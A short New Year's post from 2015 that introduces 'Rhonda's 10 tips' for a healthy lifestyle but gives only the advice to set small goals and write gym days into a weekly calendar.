Here's To A Healthy 2015!

We cannot believe the holidays are over and 2015 is here! There is something really exciting about January because we believe it's all about new beginnings. This month is about making new goals and writing down those New Year's resolutions. Here are Rhonda's 10 tips how to keep a healthy lifestyle!

Remember, start with small goals so you do not overwhelm yourself. We've been told it's very effective to write down those goals in a weekly calendar. For example, write down every Tuesday and Thursday you will attend the gym.
